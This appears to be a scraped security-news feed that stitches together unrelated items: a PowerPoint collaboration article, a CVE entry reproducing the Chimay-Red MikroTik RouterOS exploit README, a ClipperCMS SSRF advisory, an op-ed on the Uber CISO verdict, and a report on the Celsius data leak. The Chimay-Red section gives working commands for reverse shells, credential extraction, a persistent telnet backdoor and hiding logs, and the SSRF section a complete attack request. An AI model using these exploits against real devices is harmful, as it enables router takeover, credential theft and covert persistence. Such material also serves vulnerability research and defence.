By Owais Sultan
Among the several online presentation-making platforms, Microsoft PowerPoint is the first choice of professionals. The platform allows you…
This is a post from HackRead.com Read the original post: 6 Best Ways to Make a Collaborative PowerPoint Presentation

Among the several online presentation-making platforms, **Microsoft PowerPoint** is the first choice of professionals. The platform allows you complete access to all tools, themes, layouts, and designs that work wonders for your presentation. A presentation with just the right tone, right colors, and simple yet engaging slides will easily win over your audience. 

Hence, a to-the-point presentation with beautiful slides will help you manage the flow of your meeting and remind your audience of essential points. Also, adding slide transitions, charts, graphs, animations, and videos will further enhance your presentation. 

Nowadays, templates have made the life of corporate workers easier. Creating slides from scratch is no longer an option to consider. SlideUpLift provides you with exceptionally well-designed **Google Slides Themes**!  Now you can create visually enthralling presentations with ease. Find the right PowerPoint templates for your presentation from our huge array of PowerPoint templates. 

However, with the present transition of global corporate sectors to online collaboration activities, what happens if you have a group presentation to work on? What if you get a task to work as a team on one presentation? 

Worry not! Microsoft PowerPoint allows you to share your presentation, allowing others to easily make changes and modifications to that one presentation. The platform takes advantage of cloud technology and enables you to collaborate online. What’s more? All of this is super easy to handle and work with! 

Here we are sharing with you the five best ways to make a collaborative presentation on Microsoft PowerPoint. 

What is the first thing to be done in a collaborative PowerPoint presentation? Of course! Share. 

It is pretty simple, **cloud-based**, and secure to share your PowerPoint presentation. You need to enable the privileges to make the file accessible to others who intend to work on the file. Here’s a step-by-step guide to sharing your file:

*   Click on your PowerPoint presentation and open the file.  
    
*   Locate and select the Share button on the window’s top right corner.  
    
*   PowerPoint will show you a prompt dialogue box asking you to save your file on SharePoint Online or OneDrive for business. You can choose from any one of these since both works similarly.  
    
*   Now you will be able to invite people to work on your file, either by email or by an URL.   
    
*   If you choose to email, enter the recipient’s email address. Next, allow the permissions and click the share option.  
    
*   If you choose the Get Link option, you can edit the access permissions and generate the link for sharing with collaborators. 

**2 Check Who Is Working on Which Part of the Presentation**

Once other people start working on the presentation, you will be able to see their profile pictures and name in the top right corner of the window. Also, they will appear on the slide, and their terms and icons will appear next to the slide thumbnails. 

This implies you can effortlessly see who is operating on which part of the presentation. Any and every change is going to save instantly and synced for everyone. Hence, you are assured of getting a seamless presentation design procedure.

**3 Monitor and Track Changes**

Conflicting edits are bound to occur when several people are working together. Whenever any collaborator edits the presentation, the host gets a notification. You can seamlessly track changes and monitor edits in real-time.

When you open the file, you can glimpse the unread modifications. All the details, including who did the editing and when it was saved, will be highlighted in the slides thumbnail panel.

In case of conflicting changes, PowerPoint displays both edits side by side before saving them. This allows you to address these conflicts and resolve them accordingly.

**4 Easily Access the Previous Versions of the Presentation**

The cloud-based PowerPoint presentation sharing also has a facility that allows you to retrieve the previous versions of your file. This will enable you to monitor the file changes over time. Also, this process is automatic and thus requires no separate effort from your end. 

If you want to view the previous versions of your presentation, all you need to do is click on File, Info, and Version History.

**5 Discuss and Negotiate in a Group Chat**

Microsoft PowerPoint allows starting a chat while working on the presentation. Below are the steps you must follow:

*   Find the co-author option next to share.
*   Click on the Join Group Chat button, and you will be able to chat with your collaborators. 

This makes the discussion of ideas super easy and convenient. However, the chat history isn’t saved. It’ll start a new chat altogether every time you close and open your chat. 

Finally, you can write comments beside slides and edits. This can provide direct feedback on the slide and help jot down important discussion points. 

All you need to do is to:

*   Click on the Review tab.
*   Click on New Comment and type your feedback.
*   Once you post the comment, it will appear when you highlight the particular slide element.

Therefore, these are a few ways to share and create a collaborative PowerPoint presentation with your colleagues. Microsoft PowerPoint is one of the fairest forums to do so conveniently and efficiently.

**Summing up**

A PowerPoint presentation may seem pretty basic, but still one of the top choices for any business to convey any message. A good PowerPoint presentation can engage your target audience and will help you convert your potential lead into a potential client. So choose the right platform for an impeccable presentation.

1.  **How To Screencast on Windows 10**
2.  **How to Use OneDrive for Office 365 on Desktop**
3.  **Fix Microsoft Outlook When Stuck on Loading Profile**
4.  **MySQL Performance Tuning: Top 5 Tips for Blazing Fast Queries**
5.  **5 PDF Tricks You Should Know To Improve Document Productivity**

6 Best Ways to Make a Collaborative PowerPoint Presentation

The Mikrotik RouterOS web server allows memory corruption in releases before Stable 6.38.5 and Long-term 6.37.5, aka Chimay-Red. A remote and unauthenticated user can trigger the vulnerability by sending a crafted HTTP request. An attacker can use this vulnerability to execute arbitrary code on the affected system, as exploited in the wild in mid-2017 and later.

**Chimay-Red**

Reverse engineering of Mikrotik exploit from Vault 7 CIA Leaks

See the PDF for more info (not updated)

**Vulnerable versions**

Until RouterOS 6.38.4

What's new in 6.38.5 (2017-Mar-09 11:32):  
!) www - fixed http server vulnerability;

**Proof of concepts****CrashPOC**

Simple crash sending -1 as content-length in post header

**StackClashPOC**

Stack clash exploit using two threads, missing ROP chain

**Working exploits**

As the ROP is dynamically created, you have to extract the www binary from the RouterOS firmware.  
(It's placed in /nova/bin/)  
Check that the running version is the same.  
To simplify extraction you can use:

    $ ./tools/getROSbin.py 6.38.4 x86 /nova/bin/www www_binary
    

**StackClash\_x86**

Stack clash exploit using two threads with ROP chain to run bash commands

**Reverse shell:**

In a shell:

In another shell:

    $ ./StackClash_x86.py 192.168.8.1 80 www_binary "/bin/mknod /ram/f p; /bin/telnet 192.168.8.5 1234 < /ram/f | /bin/bash > /ram/f 2>&1"
    

Where:

*   RouterOS IP: 192.168.8.1
*   PC IP: 192.168.8.5

**Extract users and passwords**

    $ ./StackClash_x86.py 192.168.8.1 80 www_binary "cp /rw/store/user.dat /ram/winbox.idx"
    $ sleep 3 # (wait some seconds that www is restarted)
    $ curl -s http://192.168.8.1/winbox/index | ./tools/extract_user.py -
    

**Export configs**

You can execute command in Mikrotik console with /nova/bin/info.  
Eg: /nova/bin/info "/system reboot" will reboot the system.

    $ ./StackClash_x86.py 192.168.8.1 80 www_binary "/nova/bin/info '/export' > /ram/winbox.idx"
    $ sleep 20 # (it's a bit slow to execute /export command)
    $ curl -s http://192.168.8.1/winbox/index
    

**StackClash\_mips**

Stack clash exploit using two threads with ROP chain + shell code to run bash commands  
On mips version of www the stack is RWX, so we can jump to the stack.

You can run the same bash command as the x86 version.

**LCD**

Funny command

    $ ./tools/getROSbin.py 6.38.4 mipsbe /nova/bin/www www_binary
    $ ./StackClash_mips.py 192.168.8.1 80 www_binary "echo hello world > /dev/lcd"
    

**Super Mario sound**

Do not do it! ;-P

    $ ./StackClash_mips.py 192.168.8.1 80 www_binary "while [ true ]; do /nova/bin/info ':beep frequency=660 length=100ms;:delay 150ms;:beep frequency=660 length=100ms;:delay 300ms;:beep frequency=660 length=100ms;:delay 300ms;:beep frequency=510 length=100ms;:delay 100ms;:beep frequency=660 length=100ms;:delay 300ms;:beep frequency=770 length=100ms;:delay 550ms;:beep frequency=380 length=100ms;:delay 575ms;:beep frequency=510 length=100ms;:delay 450ms;:beep frequency=380 length=100ms;:delay 400ms;:beep frequency=320 length=100ms;:delay 500ms;:beep frequency=440 length=100ms;:delay 300ms;:beep frequency=480 length=80ms;:delay 330ms;:beep frequency=450 length=100ms;:delay 150ms;:beep frequency=430 length=100ms;:delay 300ms;:beep frequency=380 length=100ms;:delay 200ms;:beep frequency=660 length=80ms;:delay 200ms;:beep frequency=760 length=50ms;:delay 150ms;:beep frequency=860 length=100ms;:delay 300ms;:beep frequency=700 length=80ms;:delay 150ms;:beep frequency=760 length=50ms;:delay 350ms;:beep frequency=660 length=80ms;:delay 300ms;:beep frequency=520 length=80ms;:delay 150ms;:beep frequency=580 length=80ms;:delay 150ms;:beep frequency=480 length=80ms;:delay 500ms;'; done"
    

**Upload binaries**

To upload busybox-mips in /ram/busybox  
In a shell:

    $ wget https://busybox.net/downloads/binaries/1.28.1-defconfig-multiarch/busybox-mips  
    $ { echo "echo Uploading..."; hexdump -v -e '"echo -e -n " 1024/1 "\\\\x%02X" " >> /ram/busybox\n"' busybox-mips | sed -e "s/\\\\\\\\x  //g"; } | nc -l -q 0 -p 1234
    

In another shell (note that this is the reverse shell command):

    $ ./StackClash_mips.py 192.168.8.1 80 www_binary "/bin/mknod /ram/f p; /bin/telnet 192.168.8.5 1234 < /ram/f | /bin/bash > /ram/f"
    

and wait until the connection automatically close.  
(Once the file is uploaded, run again reverse shell (this time only listening with nc -l -p 1234) and you will find busybox inside /ram/)

**Persistent telnet server**

You can run script at each boot by creating a bash script in /flash/etc/rc.d/run.d/.  
Pay attention to set execution permissions, or your router will stuck on boot and you will have to restore the firmware!  
This example enables a persistent telnet server on port 23000.  
In a shell:

    $ wget https://busybox.net/downloads/binaries/1.28.1-defconfig-multiarch/busybox-mips 
    $ { echo "echo Installing..."; hexdump -v -e '"echo -e -n " 1024/1 "\\\\x%02X" " >> /flash/bin/busybox\n"' busybox-mips | sed -e "s/\\\\\\\\x  //g"; echo "chmod 777 /flash/bin/busybox"; echo "/flash/bin/busybox --install -s /flash/bin/"; echo "mkdir -p /flash/etc/rc.d/run.d"; echo 'echo -e "#!/flash/bin/sh\ntelnetd -p 23000 -l sh" > /flash/etc/rc.d/run.d/S89own'; echo "chmod 777 /flash/etc/rc.d/run.d/S89own"; echo "/nova/bin/info '/system reboot'"; echo "echo Done! Rebooting..."; } | nc -l -p 1234
    

In another shell (note that this is the reverse shell command):

    $ ./StackClash_mips.py 192.168.8.1 80 www_binary "/bin/mknod /ram/f p; /bin/telnet 192.168.8.5 1234 < /ram/f | /bin/bash > /ram/f"
    

and wait until Done! Rebooting... appears.  
Once the router is up again:

    $ telnet 192.168.8.1 23000
    Trying 192.168.8.1...
    Connected to 192.168.8.1.
    Escape character is '^]'.
    
    
    MikroTik v6.38.4 (stable)
    / #
    

**StackClash\_resock\_mips**

Reuse the http socket to spawn a shell, so you can have a shell without a reverse connection.

    $ ./tools/getROSbin.py 6.38.4 mipsbe /nova/bin/www www_binary
    $ ./StackClash_resock_mips.py 192.168.8.1 80 www_binary
    [...]
    sh: turning off NDELAY mode
    
    Got root ;-)
    
    

**Upload binaries without a reverse shell**

To upload busybox-mips in /ram/busybox

    $ wget https://busybox.net/downloads/binaries/1.28.1-defconfig-multiarch/busybox-mips  
    $ ./StackClash_resock_mips.py 192.168.8.1 80 www_binary busybox-mips /ram/busybox   
    [...]   
    Uploading busybox-mips in /ram/busybox...   
    Upload done!
    sh: turning off NDELAY mode
    
    Got root ;-)
    
    chmod 777 /ram/busybox
    /ram/busybox
    BusyBox v1.28.1 (2018-02-15 14:34:02 CET) multi-call binary.
    [...]
    

**Change boot logo**

Only RGB Bitmap 24 bit (not compressed) files are supported.  
Max size: 160px width, 76px height  
You can find a sample here

    $ ./StackClash_resock_mips.py 192.168.8.1 80 www_binary docs/logo.bmp /flash/boot/logo.bmp  
    [...]
    Uploading docs/logo.bmp in /flash/boot/logo.bmp...
    Upload done!
    sh: turning off NDELAY mode
    
    Got root ;-)
    
    reboot
    *** Connection closed by remote host ***
    

**Hide logs**

To remove logs after your post exploitation actions

    / # /nova/bin/info ":for i from=1 to=1000 do={ :log info message='Some dummy info' }"
    

**FAQ****Where does one get the chimay-red.py file, that this tool kit relies on?**

This is a reverse engineering of leaked CIA documentation.  
There is no chimay-red.py publicly available.

**I can't understand how the stack clash work.**

I'll update the PDF as soon as I have enough time, anyway:  
We know that:

*   each thread has 128KB of stack
*   each stack of each thread is stacked on the top of the previous thread.

Thanks to Content-Length and alloca macro we can control the Stack Pointer and where the post data will be written.  
If we send a Content-Length bigger than 128KB to socket of thread A, the Stack Pointer will point inside the stack of another thread (B) and so the POST data (of thread A) will be written inside the stack of thread B (in any position we want, we only need to adjust the Content-Length value).  
So now we can write a ROP chain in the stack of thread B starting from a position where a return address is saved.  
When we close the socket of thread B, the ROP chain will start because the function that is waiting for data will return (but on our modified address).

**x86**

The ROP chain construct "system" string and "your\_shell\_cmd" string looking for chunks of strings inside the binary and concatenating them in an unused area of memory.  
Then we return to "dlsym" function (present in the PLT) passing as argument the address of just created string "system" to find the address of "system" function.  
Now we can return to the address of system passing as argument the address of the just created string "your\_shell\_cmd".

**mips**

DEP is disabled on this version of www, so I can execute the stack.  
But I cannot use system function because "/bin/sh" is not present on the file system, so I used execve directly.  
A small ROP (3 gadgets) find the address of a location on the stack (where I put the shell code), and then jump to that address.

In the shell code I make a fork (syscall 4002), then I populate an array of 4 pointers with the address of the strings "/bin/bash", "-c", "your\_shell\_cmd" using the leaked address of the stack (the last pointer is left NULL).  
Then I populate a0, a1, a2 with rispectively: address of "/bin/bash", address of the array populated at the preceeding step and the address of the NULL entry of the array.  
At this point I can launch the syscall 4011 (execve) to execute my bash command.

**Not wokring on some versions**

I have no time to test all RouterOS versions.  
On all stable version i tested (6.28, 6.27, 6.37.2, 6.37.3, 6.38.3, 6.38.4) it is working (both x86 and mipsbe).  
On 6.37.5 it isn't working, but I noticed that this is a bugfix version.  
Maybe on all bugfix version my tool is not working (not verified).

**HTTPS**

I implemented the HTTPS version using ssl.wrap_socket and it is working if www has just started.  
But if www has been running for some time I have to make it crash before running the exploit.  
If I make www crash with HTTPS enabled, then www doesn't bind on HTTPS socket any more...  
So for now I didn't include HTTPS support in the public release because in most scenario it is totally NOT working and make the web server unreachable after the crash.

**Architecture discovery**

I didn't find a way to discover the architecture via the web server (www).  
I think the CIA tool was using MNDP (Mikrotik Network Discovery Protocol), but it is only available in the same LAN, so it will not work from a remote network.  
So I didn't include the architecture discovery in my tool.  
You have to test all the archtecture if you are remotely or use a MNDP tool if you in the same LAN (there are a lots of MNDP tools on github).

**Others architectures than x86 and MIPSBE/SMIPS**

I have no boards based on ARM, TILE, PowerPC and MMIPS, so I can't debug the vulnerability on these versions.

(Probably for the last one it is enough to convert the mipsbe addresses in little endian).  
If you can support other arch then send a PR!

**Firmware upgrade persistence**

It's possibile to make your rootkit persistent to firmware upgrade by customizing the initramfs...more info

CVE-2017-20149: GitHub - BigNerd95/Chimay-Red: Working POC of Mikrotik exploit from Vault 7 CIA Leaks

ClipperCMS 1.3.3 was discovered to contain a Server-Side Request Forgery (SSRF) via the rss_url_news parameter at /manager/index.php.

There is a SSRF vulnerability in the rss\_url\_news parameter of the index.php?a=30 interface in ClipperCMS-clipper\_1.3.3

    POST /manager/index.php?a=30 HTTP/1.1
    Host: 192.168.156.136
    Content-Length: 6669
    Cache-Control: max-age=0
    Upgrade-Insecure-Requests: 1
    Origin: http://192.168.156.136
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Referer: http://192.168.156.136/manager/index.php?a=17
    Accept-Encoding: gzip, deflate
    Accept-Language: zh,zh-CN;q=0.9
    Cookie: iCMS_ADMIN_AUTH=51bf76419l_i3_t-1_yZJVXGwCgSQ1XfO4exCxVvHn4s8hU09WAjnkVsBo-0gp1LoJu3_X3RBjw9g_ZEpv5avtlt4MCgPGuzQYz31RXZtB9wWh-Yh5JB6CnhL2HOsg; my_wikiUserID=3; my_wikiUserName=123; 4c707ae227f79bf7de196947377b3e3d=da02mk81p3acuoocm7sp7jk4u2; PHPSESSID=rfkgmjgnf85n1qcc1ii3rsqag6; SN6310b3eaca4dc=ru28c1conkikqpb0k7ualk29u5; KCFINDER_showname=on; KCFINDER_showsize=off; KCFINDER_showtime=off; KCFINDER_order=name; KCFINDER_orderDesc=off; KCFINDER_view=thumbs; KCFINDER_displaySettings=off
    Connection: close
    
    site_id=6310b3eb4111b&settings_version=1.3.3&site_name=My+Clipper+Site&valid_hostnames=&modx_charset=UTF-8&xhtml_urls=1&site_start=1&error_page=1&unauthorized_page=1&site_status=1&site_unavailable_page=&reload_site_unavailable=&site_unavailable_message=The+site+is+currently+unavailable&siteunavailable_message_default=The+site+is+currently+unavailable.&track_visitors=0&auto_template_logic=parent&template_rules_tv=&default_template=3&old_template=3&publish_default=0&cache_default=1&search_default=1&auto_menuindex=1&txt_custom_contenttype=&custom_contenttype=application%2Frss%2Bxml%2Capplication%2Fpdf%2Capplication%2Fvnd.ms-word%2Capplication%2Fvnd.ms-excel%2Ctext%2Fhtml%2Ctext%2Fcss%2Ctext%2Fxml%2Ctext%2Fjavascript%2Ctext%2Fplain&server_offset_time=0&server_protocol=http&rss_len=10&error_handling_deprecated=1&error_handling_silent=0&jquery_url=assets%2Fjs%2Fjquery.min.js&jquery_plugin_dir=assets%2Fjs%2F&jquery_noconflict=1&friendly_urls=0&friendly_url_prefix=&friendly_url_suffix=.html&friendly_alias_urls=1&use_alias_path=0&allow_duplicate_alias=0&automatic_alias=1&use_udperms=1&udperms_allowroot=0&failed_login_attempts=3&webuser_hash_method=1&blocked_minutes=60&reload_captcha_words=&captcha_words=Clipper%2CAccess%2CBetter%2CBitCode%2CCache%2CDesc%2CDesign%2CExcell%2CEnjoy%2CURLs%2CTechView%2CGerald%2CGriff%2CHumphrey%2CHoliday%2CIntel%2CIntegration%2CJoystick%2CJoin%28%29%2CTattoo%2CGenetic%2CLight%2CLikeness%2CMarit%2CMaaike%2CNiche%2CNetherlands%2COrdinance%2COscillo%2CParser%2CPhusion%2CQuery%2CQuestion%2CRegalia%2CRighteous%2CSnippet%2CSentinel%2CTemplate%2CThespian%2CUnity%2CEnterprise%2CVerily%2CVeri%2CWebsite%2CWideWeb%2CYap%2CYellow%2CZebra%2CZygote&captcha_words_default=ClipperCMS%2CAccess%2CBetter%2CBitCode%2CChunk%2CCache%2CDesc%2CDesign%2CExcell%2CEnjoy%2CURLs%2CTechView%2CGerald%2CGriff%2CHumphrey%2CHoliday%2CIntel%2CIntegration%2CJoystick%2CJoin%28%29%2COscope%2CGenetic%2CLight%2CLikeness%2CMarit%2CMaaike%2CNiche%2CNetherlands%2COrdinance%2COscillo%2CParser%2CPhusion%2CQuery%2CQuestion%2CRegalia%2CRighteous%2CSnippet%2CSentinel%2CTemplate%2CThespian%2CUnity%2CEnterprise%2CVerily%2CTattoo%2CVeri%2CWebsite%2CWideWeb%2CYap%2CYellow%2CZebra%2CZygote&emailsender=1%401.com&smtp=0&smtp_host=&smtp_port=&smtp_prefix=ssl&smtp_user=&smtp_pass=&reload_emailsubject=&emailsubject=Your+login+details&emailsubject_default=Your+login+details&reload_signupemail_message=&signupemail_message=Hello+%5B%2Buid%2B%5D+%0D%0A%0D%0AHere+are+your+login+details+for+%5B%2Bsname%2B%5D+Content+Manager%3A%0D%0A%0D%0AUsername%3A+%5B%2Buid%2B%5D%0D%0APassword%3A+%5B%2Bpwd%2B%5D%0D%0A%0D%0AOnce+you+log+into+the+Content+Manager+%28%5B%2Bsurl%2B%5D%29%2C+you+can+change+your+password.%0D%0A%0D%0ARegards%2C%0D%0ASite+Administrator&system_email_signup_default=Hello+%5B%2Buid%2B%5D+%0D%0A%0D%0AHere+are+your+login+details+for+%5B%2Bsname%2B%5D+Content+Manager%3A%0D%0A%0D%0AUsername%3A+%5B%2Buid%2B%5D%0D%0APassword%3A+%5B%2Bpwd%2B%5D%0D%0A%0D%0AOnce+you+log+into+the+Content+Manager+%28%5B%2Bsurl%2B%5D%29%2C+you+can+change+your+password.%0D%0A%0D%0ARegards%2C%0D%0ASite+Administrator&reload_websignupemail_message=&websignupemail_message=Hello+%5B%2Buid%2B%5D%0D%0A%0D%0AHere+are+your+login+details+for+%5B%2Bsname%2B%5D%3A%0D%0A%0D%0AUsername%3A+%5B%2Buid%2B%5D%0D%0APassword%3A+%5B%2Bpwd%2B%5D%0D%0A%0D%0AOnce+you+log+into+%5B%2Bsname%2B%5D+%28%5B%2Bsurl%2B%5D%29%2C+you+can+change+your+password.%0D%0A%0D%0ARegards%2C%0D%0ASite+Administrator&system_email_websignup_default=Hello+%5B%2Buid%2B%5D%0D%0A%0D%0AHere+are+your+login+details+for+%5B%2Bsname%2B%5D%3A%0D%0A%0D%0AUsername%3A+%5B%2Buid%2B%5D%0D%0APassword%3A+%5B%2Bpwd%2B%5D%0D%0A%0D%0AOnce+you+log+into+%5B%2Bsname%2B%5D+%28%5B%2Bsurl%2B%5D%29%2C+you+can+change+your+password.%0D%0A%0D%0ARegards%2C%0D%0ASite+Administrator&reload_system_email_webreminder_message=&webpwdreminder_message=Hello+%5B%2Buid%2B%5D%0D%0A%0D%0ATo+activate+your+new+password+click+the+following+link%3A%0D%0A%0D%0A%5B%2Bsurl%2B%5D%0D%0A%0D%0AIf+successful+you+can+use+the+following+password+to+login%3A%0D%0A%0D%0APassword%3A%5B%2Bpwd%2B%5D%0D%0A%0D%0AIf+you+did+not+request+this+email+then+please+ignore+it.%0D%0A%0D%0ARegards%2C%0D%0ASite+Administrator&system_email_webreminder_default=Hello+%5B%2Buid%2B%5D%0D%0A%0D%0ATo+activate+your+new+password+click+the+following+link%3A%0D%0A%0D%0A%5B%2Bsurl%2B%5D%0D%0A%0D%0AIf+successful+you+can+use+the+following+password+to+login%3A%0D%0A%0D%0APassword%3A%5B%2Bpwd%2B%5D%0D%0A%0D%0AIf+you+did+not+request+this+email+then+please+ignore+it.%0D%0A%0D%0ARegards%2C%0D%0ASite+Administrator&manager_language=english&manager_theme=ClipperModern&warning_visibility=1&docid_visibility=1&tree_page_click=27&remember_last_tab=1&tree_show_protected=0&rss_url_news=http%3A%2F%2F192.168.156.136%3A88%2F123&rss_url_security=http%3A%2F%2F192.168.156.136%3A88%2F123123123&datepicker_year_range=-10&date_format=dd-mm-yy&time_format=HH%3Amm%3Ass&number_of_logs=100&number_of_results=20&validate_referer=1&strip_image_paths=1&use_browser=1&rb_webuser=0&rb_base_dir=A%3A%2Frecent%2Fwez_paper%2Fcms%2FClipperCMS-clipper_1.3.3%2FClipperCMS-clipper_1.3.3%2Fassets%2F&rb_base_url=assets%2F&file_browser=kcfinder&upload_images=bmp%2Cico%2Cgif%2Cjpeg%2Cjpg%2Cpng%2Cpsd%2Ctif%2Ctiff&upload_media=au%2Cavi%2Cmp3%2Cmp4%2Cmpeg%2Cmpg%2Cwav%2Cwmv&upload_flash=fla%2Cflv%2Cswf&clean_uploaded_filename=0&use_editor=1&which_editor=TinyMCE&fe_editor_lang=english&editor_css_path=&tinymce_editor_theme=editor&tinymce_custom_plugins=style%2Cadvimage%2Cadvlink%2Csearchreplace%2Cprint%2Ccontextmenu%2Cpaste%2Cfullscreen%2Cnonbreaking%2Cxhtmlxtras%2Cvisualchars%2Cmedia&tinymce_custom_buttons1=undo%2Credo%2Cselectall%2Cseparator%2Cpastetext%2Cpasteword%2Cseparator%2Csearch%2Creplace%2Cseparator%2Cnonbreaking%2Chr%2Ccharmap%2Cseparator%2Cimage%2Clink%2Cunlink%2Canchor%2Cmedia%2Cseparator%2Ccleanup%2Cremoveformat%2Cseparator%2Cfullscreen%2Cprint%2Ccode%2Chelp&tinymce_custom_buttons2=bold%2Citalic%2Cunderline%2Cstrikethrough%2Csub%2Csup%2Cseparator%2Cbullist%2Cnumlist%2Coutdent%2Cindent%2Cseparator%2Cjustifyleft%2Cjustifycenter%2Cjustifyright%2Cjustifyfull%2Cseparator%2Cstyleselect%2Cformatselect%2Cseparator%2Cstyleprops&tinymce_custom_buttons3=&tinymce_custom_buttons4=&tinymce_css_selectors=&filemanager_path=A%3A%2Frecent%2Fwez_paper%2Fcms%2FClipperCMS-clipper_1.3.3%2FClipperCMS-clipper_1.3.3%2F&upload_files=aac%2Cau%2Cavi%2Ccss%2Ccache%2Cdoc%2Cdocx%2Cgz%2Cgzip%2Chtaccess%2Chtm%2Chtml%2Cjs%2Cmp3%2Cmp4%2Cmpeg%2Cmpg%2Cods%2Codp%2Codt%2Cpdf%2Cppt%2Cpptx%2Crar%2Ctar%2Ctgz%2Ctxt%2Cwav%2Cwmv%2Cxls%2Cxlsx%2Cxml%2Cz%2Czip&upload_maxsize=1048576&new_file_permissions=0644&new_folder_permissions=0755

CVE-2022-41495: insight/ClipperCMS SSRF2.md at master · jayus0821/insight

Can already beleaguered CISOs now add possible legal charges to their smorgasbord of job considerations? Disclose a breach to comply and face dismissal, or cover it up and face personal punishment.

This is a challenging time to be a CISO. The security community has been eagerly following multiple stories regarding Uber in the past few weeks. From the play-by-play of their recent major hack, to last week's guilty verdict of former Uber security chief Joe Sullivan, CISOs are facing considerable challenges.

The verdict in the Sullivan case found him guilty of obstructing a federal investigation and concealing a felony from the government. According to the New York Times: "Stephanie M. Hinds, the US attorney for the Northern District of California, said in a statement: 'We will not tolerate concealment of important information from the public by corporate executives more interested in protecting their reputation and that of their employers than in protecting users. Where such conduct violates the federal law, it will be prosecuted.'"

The government is sending a message to CISOs in the US — disclose and potentially lose your job, or cover up and go to jail. If they disclose information to the government, they meet compliance regulations, but their job will be on the line. A breach, especially one in which personally identifiable information (PII) is compromised, will result in a lawsuit and the CISO will likely get fired.

But the punishment for noncompliance, inability to demonstrate full disclosure, or any gray zone in the middle is now personal (unlike other regulations where noncompliance results in fines for the company). Covering up a breach, in the Uber case, and then further hiding details of the hack in the context of a federal investigation, can result in prison time.

This case also brings to light a new challenge for CISOs: "What did you know?" Concealing information is an important part of this case and verdict. Hiding information by saying "I didn't know" isn't an answer for a CISO with a data breach — it reflects negligence at best and is at worst a lie. Security teams need to know — and most likely _do_ know about their security posture, from the many security tools they use — and what they know can't be concealed.

The Sullivan case has enormous gravity for the security industry. What can we expect from CISOs? Are these expectations fair?

**Managing Expectations for CISOs**

According to proposed legislation, the expectations are as follows. From the Form 8-K (6-K) Disclosure About Material Cybersecurity Incidents (PDF) — the following rules will be added:

*   New Item 1.05 of Form 8-K will require SEC-reporting companies to disclose a material cybersecurity incident within four business days of determining that a material incident has occurred.
*   The company must determine the materiality of a cybersecurity incident "as soon as reasonably practicable" after discovery of the incident.
*   The SEC indicated last year in a cybersecurity enforcement action that companies must maintain disclosure controls and procedures designed to ensure that all available relevant information concerning any cybersecurity incident is analyzed for timely disclosure in the company's SEC reports.
*   "Cybersecurity incident" means an unauthorized occurrence on or through company's information systems that jeopardizes the confidentiality, integrity, or availability of a company's information systems "or any information residing therein."

The question is, what should CISOs do? They're already deploying multiple security solutions. On-premises, cloud, endpoint detection, firewalls, ransomware recovery, workload protection … the list goes on and on. Still, hackers get in — as in Uber's case — often by simply nagging an employee to click on a phishing link. Millions of dollars on attack prevention and "user XYZ" takes the system down.

**Ways to Aid CISOs**

I've been working in security for most of my career, building the tools that keep hackers out. I'd like to propose a few ways we can help CISOs out of the complicated situation they're in.

1.  **Get rid of tools that alert on every potential attack or misconfiguration.** A generation of alert-based security tools pinging security teams for every small thing has made the situation worse. There is no way for a security team to keep up with the hundreds of alerts, mostly false alerts, that their security tools provide. They need to be able to see a real-time incoming attack, in the context of their specific assets – one that provides a sequence of events identifying immediate risk to the company's most valuable assets. We need to do better to support security teams with tools that provide value, not just alerts.
2.  **Retool.** Regulators expect CISOs to be able to detect, analyze, and understand impact of real attack events (vs. potential misconfigurations) fast. This requires retooling and rethinking much of the security software "stack" to ensure that we're keeping a step ahead of hackers. Using dated techniques is one area that often results in friction between security best practices and reality.
3.  **Work more closely with government** on the important regulations that are being proposed for legislation. To protect our CISOs from falling into felony territory, we need legislation that protects the public while also protecting CISOs that come forward and report data breaches. CISOs who genuinely plan for every attack scenario (and can show this planning) but find themselves outsmarted by hackers should not be penalized by the companies they serve.
4.  **Align security goals.** Many organizations are moving too fast to focus on security — and it will catch up with them. Development teams are increasingly leveraging agile techniques like CI/CD (continuous integration, delivery, and deployment) to deliver new and innovative features quickly and maintain a competitive advantage. And security is not part of the dev team's or any typical employee's everyday thought process — but it must be. Organizations must have a security strategy that permeates the organization so everyone — developers, marketing, HR, finance, the board, and everyone else share the responsibility with the CISO and security teams. _All_ employees play a role in securing data assets.

What the Uber Breach Verdict Means for CISOs in the US

By releasing half a million users’ transactions in a bankruptcy court filing, the company has opened a vast breach in its users’ financial privacy.

The paradoxical nature of cryptocurrency's privacy is that the blockchain, that unchangeable ledger of all a cryptocurrency's transactions, serves as both a map and a mask: Bitcoin are easy enough to follow from one address to the next. But only a few entities, like the cryptocurrency exchanges that allow users to trade their crypto for traditional currency, are able to match the inscrutable strings of numbers and letters in those addresses to real-world identities. So when one of those exchanges suddenly dumps a massive internal user database online, they haven't just spilled their own data. They've offered a key to decipher a vastly larger set of financial secrets.

That's what happened last week when Celsius, a cryptocurrency exchange facing bankruptcy, leaked an enormous collection of its users' transaction data through an unusual sort of privacy breach: a court filing. As part of its bankruptcy proceedings—in which the company's owners are accused of pulling tens of millions of dollars worth of crypto out of the exchange before revealing its insolvency—the company's attorneys released a document that appears to include the transaction data of half a million of its users from April of this year until it ceased trading in June. That database was briefly posted as a 14,500-page PDF to the court records website PACER before being taken down—but not before Gizmodo copied it to the Internet Archive, where it was widely downloaded before being removed there, too.

The data dump includes the names and transaction details of Celsius' users along with the dates and amounts of each payment. The database doesn't include the cryptocurrency addresses that directly identify senders and recipients on cryptocurrencies' blockchains, but the unique payment amounts, detailed down to more than a dozen decimal places of precision in many cases, nonetheless make it possible to match the payments to blockchains' records.

All of that means that the Celsius leak offers a rare gift to both professional and amateur cryptocurrency tracers, allowing them to not only see Celsius users' transactions, but also identify and trace those users' funds across the blockchains. That could potentially open new possibilities to identify scammers, hackers, or any other illicit users who might have exploited Celsius as a cash-out service for ill-gotten coins. But it also opens Celsius' users to exploitation by any rip-off artist or thief who combs through the data, connects it to other accounts, and identifies their cryptocurrency holdings as a ripe target.

"This is really one of the worst exchange data breaches since Mt. Gox," says Nick Bax, head of research at security consultancy and asset recovery firm Convex Labs. But even as he compares the Celsius leak to the disastrous breach of the early Bitcoin exchange Mt. Gox, which was bankrupted by hackers in 2014 and had its transaction database leaked online, he also calls it a "dream come true for analysts" focused on cryptocurrency tracing.

